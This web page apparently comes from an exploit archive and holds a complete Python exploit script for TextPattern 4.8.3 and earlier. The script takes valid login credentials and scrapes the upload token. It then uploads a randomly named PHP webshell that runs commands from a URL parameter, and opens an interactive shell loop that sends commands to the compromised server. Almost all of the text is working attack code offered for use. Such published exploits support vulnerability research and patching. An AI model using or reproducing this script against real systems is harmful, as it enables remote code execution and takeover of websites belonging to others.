扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 |
#!/usr/bin/python3 # Exploit Title: TextPattern <= 4.8.3 - Authenticated Remote Code Execution via Unrestricted File Upload # Google Dork: N/A # Date: 16/10/2020 # Exploit Author: Michele '0blio_' Cisternino # Vendor Homepage: https://textpattern.com/ # Software Link: https://github.com/textpattern/textpattern # Version: <= 4.8.3 # Tested on: Kali Linux x64 # CVE: N/A import sys import json import requests from bs4 import BeautifulSoup as bs4 from time import sleep import random import string import readline # Disable SSL warnings requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) # Simple Terminal User Interface class I wrote to print run-time logs and headers class Tui (): def __init__ (self): self.red = '\033[91m' self.green = '\033[92m' self.blue = '\033[94m' self.yellow = '\033[93m' self.pink = '\033[95m' self.end = '\033[0m' self.bold = '\033[1m' def header (self, software, author, cve='N/A'): print ("\n", "{}Software:{} {}".format(self.pink, self.end, software), sep='') print ("{}CVE:{} {}".format(self.pink, self.end, cve)) print ("{}Author:{} {}\n".format(self.pink, self.end, author)) def info (self, message): print ("[{}*{}] {}".format(self.blue, self.end, message)) def greatInfo (self, message): print ("[{}*{}] {}{}{}".format(self.blue, self.end, self.bold, message, self.end)) def success (self, message): print ("[{}✓{}] {}{}{}".format(self.green, self.end, self.bold, message, self.end)) def warning (self, message): print ("[{}!{}] {}".format(self.yellow, self.end, message)) def error (self, message): print ("[{}✗{}] {}".format(self.red, self.end, message)) log = Tui() log.header (software="TextPattern <= 4.8.3", cve="CVE-2020-XXXXX - Authenticated RCE via Unrestricted File Upload", author="Michele '0blio_' Cisternino") if len(sys.argv) < 4: log.info ("USAGE: python3 exploit.py http://target.com username password") log.info ("EXAMPLE: python3 exploit.py http://localhost admin admin\n") sys.exit() # Get input from the command line target, username, password = sys.argv[1:4] # Fixing URL target = target.strip() if not target.startswith("https://") and not target.startswith("http://"): target = "http://" + target if not target.endswith("/"): target = target + "/" accessData = {'p_userid':username, 'p_password':password, '_txp_token':""} # Login log.info ("Authenticating to the target as '{}'".format(username)) s = requests.Session() try: r = s.post(target + "textpattern/index.php", data=accessData, verify=False) sleep(1) if r.status_code == 200: log.success ("Logged in as '{}' (Cookie: txp_login={}; txp_login_public={})".format(username, s.cookies['txp_login'], s.cookies['txp_login_public'])) sleep(1) # Parsing the response to find the upload token inside the main json array log.info ("Grabbing _txp_token (required to proceed with exploitation)..") soup = bs4(r.text, 'html.parser') scriptJS = soup.find_all("script")[2].string.replace("var textpattern = ", "")[:-2] scriptJS = json.loads(scriptJS) uploadToken = scriptJS['_txp_token'] log.greatInfo ("Upload token grabbed successfully ({})".format(uploadToken)) # The server reply with a 401 with the user provide wrong creds as input elif r.status_code == 401: log.error ("Unable to login. You provided wrong credentials..\n") sys.exit() except requests.exceptions.ConnectionError: log.error ("Unable to connect to the target!") sys.exit() # Crafting the upload request here headers = { "User-Agent" : "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", "Accept" : "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01", "Accept-Encoding" : "gzip, deflate", "X-Requested-With" : "XMLHttpRequest", "Connection" : "close", } # Generating random webshell name randomFilename = ''.join(random.choice(string.ascii_letters) for i in range(10)) + '.php' # Mapping multiparts here multipart_form_data = { "fileInputOrder" : (None, '1/1'), "app_mode" : (None, 'async'), "MAX_FILE_SIZE" : (None, '2000000'), "event" : (None, 'file'), "step" : (None, 'file_insert'), "id" : (None, ' '), "_txp_token" : (None, uploadToken), # Token here "thefile[]" : (randomFilename, '<?php system($_GET["efcd"]); ?>') # lol } # Uploading the webshell log.warning ("Sending payload..") try: r = s.post (target + "textpattern/index.php?event=file", verify=False, headers=headers, files=multipart_form_data) if "Files uploaded" in r.text: log.success ("Webshell uploaded successfully as {}".format(randomFilename)) except: log.error ("Unexpected error..") sys.exit() sleep(2) # Interact with the webshell (using the readline library to save the history of the executed commands at run-time) log.greatInfo ("Interacting with the HTTP webshell..") sleep (1) print() while 1: try: cmd = input ("\033[4m\033[91mwebshell\033[0m > ") if cmd == 'exit': raise KeyboardInterrupt r = requests.get (target + "files/" + randomFilename + "?efcd=" + cmd, verify=False) print (r.text) except KeyboardInterrupt: log.warning ("Stopped.") exit() except: log.error ("Unexpected error..") sys.exit() print() |
体验盒子
